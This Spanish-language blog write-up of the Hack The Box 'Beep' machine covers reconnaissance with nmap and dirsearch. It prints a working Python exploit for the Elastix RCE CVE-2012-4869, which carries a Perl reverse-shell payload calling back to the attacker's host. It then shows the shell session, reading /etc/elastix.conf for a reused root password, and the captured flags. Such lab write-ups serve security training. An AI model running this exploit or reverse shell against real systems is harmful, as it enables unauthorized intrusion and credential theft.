Entrada

Beep

Publicado
Hack The Box
Hack The Box
Por Pablo Martínez Rivas
8 min de lectura
Beep

Beep Linux · Easy - Adventure mode

🔭 Reconocimiento :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

┌──(pmartinezr㉿kali)-[~/htb/beep]
└─$ nmap -p- -sCVS -T 5 --min-rate 5000 10.129.229.183
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-02 13:45 CET
Warning: 10.129.229.183 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.129.229.183
Host is up (0.049s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp?
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.129.229.183/
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            853/udp   status
|_  100024  1            856/tcp   status
143/tcp   open  imap?
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2026-01-02T12:51:04+00:00; +4s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
| http-robots.txt: 1 disallowed entry
|_/
856/tcp   open  status     1 (RPC #100024)
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4190/tcp  open  sieve?
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax?
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1
Host script results:
|_clock-skew: 3s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 611.53 seconds

Nmap nos mestra algunos puertos abiertos, llama la atención algunos puertos http, creo que empezaría por ahí

🔭 Reconocimiento :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58

┌──(pmartinezr㉿kali)-[~/htb/beep]
└─$ dirsearch -u http://10.129.229.183/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _  _  _  _ _|_    v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/pmartinezr/htb/beep/reports/http_10.129.229.183/__26-01-02_14-16-09.txt
Target: http://10.129.229.183/
[14:16:09] Starting:
[14:16:10] 302 -  296B  - /%2e%2e//google.com  ->  https://10.129.229.183/google.com
[14:16:11] 302 -  288B  - /%3f/  ->  https://10.129.229.183/?/
[14:16:13] 403 -  292B  - /.ht_wsr.txt
[14:16:13] 403 -  295B  - /.htaccess.bak1
[14:16:14] 403 -  295B  - /.htaccess.orig
[14:16:14] 403 -  297B  - /.htaccess.sample
[14:16:14] 403 -  295B  - /.htaccess.save
[14:16:14] 403 -  295B  - /.htaccess_orig
[14:16:14] 403 -  296B  - /.htaccess_extra
[14:16:14] 403 -  293B  - /.htaccess_sc
[14:16:14] 403 -  293B  - /.htaccessBAK
[14:16:14] 403 -  293B  - /.htaccessOLD
[14:16:14] 403 -  294B  - /.htaccessOLD2
[14:16:14] 403 -  285B  - /.htm
[14:16:14] 403 -  286B  - /.html
[14:16:14] 403 -  292B  - /.httr-oauth
[14:16:14] 403 -  291B  - /.htpasswds
[14:16:14] 403 -  295B  - /.htpasswd_test
[14:16:29] 403 -  317B  - /admin/views/ajax/autocomplete/user/a
[14:16:47] 403 -  289B  - /cgi-bin/
[14:16:47] 404 -  295B  - /cgi-bin/htmlscript
[14:16:47] 404 -  303B  - /cgi-bin/a1stats/a1disp.cgi
[14:16:47] 404 -  293B  - /cgi-bin/awstats/
[14:16:47] 404 -  295B  - /cgi-bin/awstats.pl
[14:16:47] 404 -  296B  - /cgi-bin/htimage.exe?2,2
[14:16:47] 404 -  297B  - /cgi-bin/imagemap.exe?2,2
[14:16:47] 404 -  290B  - /cgi-bin/login
[14:16:47] 404 -  294B  - /cgi-bin/login.cgi
[14:16:47] 404 -  298B  - /cgi-bin/mt-xmlrpc.cgi
[14:16:47] 404 -  295B  - /cgi-bin/index.html
[14:16:47] 404 -  291B  - /cgi-bin/mt.cgi
[14:16:47] 404 -  296B  - /cgi-bin/printenv.pl
[14:16:47] 404 -  295B  - /cgi-bin/mt7/mt.cgi
[14:16:47] 404 -  294B  - /cgi-bin/login.php
[14:16:47] 404 -  302B  - /cgi-bin/mt7/mt-xmlrpc.cgi
[14:16:47] 404 -  293B  - /cgi-bin/printenv
[14:16:47] 404 -  294B  - /cgi-bin/mt/mt.cgi
[14:16:47] 404 -  293B  - /cgi-bin/test.cgi
[14:16:47] 404 -  292B  - /cgi-bin/php.ini
[14:16:47] 404 -  301B  - /cgi-bin/mt/mt-xmlrpc.cgi
[14:16:47] 404 -  293B  - /cgi-bin/test-cgi
[14:16:47] 404 -  296B  - /cgi-bin/ViewLog.asp
[14:16:57] 403 -  287B  - /error/
[14:16:57] 404 -  292B  - /error/error.log
[14:17:13] 200 -  548B  - /mailman/listinfo
[14:17:13] 403 -  289B  - /mailman/
Task Completed

Usando dirsearch encuentro algún subdirectorio

1
2
3
4
5
6
7
8
9
10
11
12
13
14

<head>
<title>Mailman CGI error!!!</title>
</head><body>
<h1>Mailman CGI error!!!</h1>
The Mailman CGI wrapper encountered a fatal error. This entry is being stored in your syslog:
<pre>
Group mismatch error. Mailman expected the CGI wrapper script to be
executed as one of the following groups:
[apache],
but the system's web server executed the CGI script as group: "asterisk".
Try tweaking the web server to run the script as one of these groups:
[apache],
or re-run configure providing the command line option:
'--with-cgi-gid=asterisk'.</pre>

Visito la URL que encontre anteriormente http://10.129.229.183/mailman/listinfo Poca información, dos grupos asterisk y apache no aparece ningún usuario por aquí.

🔭 Reconocimiento:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

┌──(pmartinezr㉿kali)-[~/htb/beep]
└─$ curl https://10.129.229.183:10000/ -k
<!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<link rel='stylesheet' type='text/css' href='/unauthenticated/style.css' />
<script type='text/javascript' src='/unauthenticated/toggleview.js'></script>
<script>
var rowsel = new Array();
</script>
<script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
<meta http-equiv="Content-Type" content="text/html; Charset=iso-8859-1">
<title></title>
<title>Login to Webmin</title></head>
<body bgcolor=#ffffff link=#0000ee vlink=#0000ee text=#000000    onLoad='document.forms[0].pass.value = ""; document.forms[0].user.focus()'>
<table class='header' width=100%><tr>
<td id='headln2l' width=15% valign=top align=left></td>
<td id='headln2c' align=center width=70%><font size=+2></font></td>
<td id='headln2r' width=15% valign=top align=right></td></tr></table>
<p><center>
<form class='ui_form' action='/session_login.cgi' method=post >
<input class='ui_hidden' type=hidden name="page" value="/">
<table class='shrinkwrapper' width=40% class='loginform'>
<tr><td>
<table class='ui_table' width=40% class='loginform'>
<thead><tr class='ui_table_head'><td><b>Login to Webmin</b></td></tr></thead>
<tbody> <tr class='ui_table_body'> <td colspan=1><table width=100%>
<tr class='ui_table_row'>
<td valign=top colspan=2 align=center class='ui_value'>You must enter a username and password to login to the Webmin server on <tt>10.129.229.183</tt>.</td>
</tr>
<tr class='ui_table_row'>
<td valign=top  class='ui_label'><b>Username</b></td>
<td valign=top colspan=1  class='ui_value'><input class='ui_textbox' name="user" value="" size=20  ></td>
</tr>
<tr class='ui_table_row'>
<td valign=top  class='ui_label'><b>Password</b></td>
<td valign=top colspan=1  class='ui_value'><input class='ui_password' type=password name="pass" value="" size=20  ></td>
</tr>
<tr class='ui_table_row'>
<td valign=top  class='ui_label'><b> </b></td>
<td valign=top colspan=1  class='ui_value'><input class='ui_checkbox' type=checkbox name="save" value="1"  id="save_1" > <label for="save_1">Remember login permanently?</label>
</td>
</tr>
</tbody></table></td></tr></table>
</td></tr>
</table>
<input class='ui_submit' type=submit value="Login">
<input type=reset value="Clear">
</form>
</center>
<script>
if (window != window.top) {
window.top.location = window.location;
}
</script>
</div><p>
<br>
</body></html>
curl: (56) OpenSSL SSL_read: OpenSSL/3.5.4: error:0A000126:SSL routines::unexpected eof while reading, errno 0

Puedes usar Curl si no quieres reconfigurar tu Navegador a una seguridad TLS de versión inferior y por lo tanto más insegura

webmin

Una portal Webmin lo que contramos en el puerto 10000

elastix

Y este sería el login que nos encontramos en el puerto 443 Un acceso a Elastix Entrar a las webs de esta máquina debes hacer un downgrade de TLS min en tu Firefox entrar en about:config (la configuración), aceptamos el “riesgo” y ponemos a 1 security.tls.version.min. Luego cuando termines de hacer la máquina puedes revertir el cambio.

⚠️ Vulnerabilidad - Remote Code Execution (RCE)

CVE: CVE-2012-4869

💣 Preparación:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

#exploit modified by infosecjunky
#https://infosecjunky.com
#exploit re-modified by pmartinezr
import urllib.request 
import ssl

rhost="10.129.229.183"
lhost="10.10.14.110"
lport=4444
extension="233"

ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.request.urlopen(url,context=ctx)

Buscando en internet o en metasploit verás que hay varios exploits sobre webmin, es posible que alguno de ellos funcione. A medida que reconocía la máquina entendía que debería haber algún exploit que funcionase contra elastix hay incluso un CVE y encontré este hecho en Python aunque tuve que modificar un poquito el código

1
2

┌──(pmartinezr㉿kali)-[~/htb/beep]
└─$ python exploit.py

En una consola lanzamos el exploit

1
2
3
4
5
6
7

=========================================
Getting reverse shell
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.110:4444
[*] Command shell session 1 opened (10.10.14.110:4444 -> 10.129.229.183:56094) at 2026-01-02 21:09:23 +0100
whoami
asterisk

Y me valí de exploit/multi/handler en Metasploit y de esta forma conseguí una conexión reversa con el usuario asterisk

👽 Acciones:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

bash-3.2$ cat /etc/elastix.conf
cat /etc/elastix.conf
mysqlrootpwd=jEhdIekWmdjE
cyrususerpwd=jEhdIekWmdjE
amiadminpwd=jEhdIekWmdjE
bash-3.2$ su -
su -
Password: jEhdIekWmdjE
[root@beep fanis]# cat user.txt
cat user.txt
006bd75c61a6abe9e7066c68b8728586
[root@beep fanis]# cat /root/root.txt
cat /root/root.txt
9521382a0f28c725b34e2cfcb03ee100

En este caso se me ocurrió explorar un rato y buscar algún archivo que me pudiera ser útil y econtré cat /etc/elastix.conf luego la elevación fue muy sencilla porque hay una reutilización de la password jEhdIekWmdjE.

achivement

Para escribir este post me he basado en una herramienta de fabricación propia ¿contribuyes? 🪲DarkReport

writeup, hackthebox
hackthebox beep
Esta entrada está licenciada bajo CC BY 4.0 por el autor.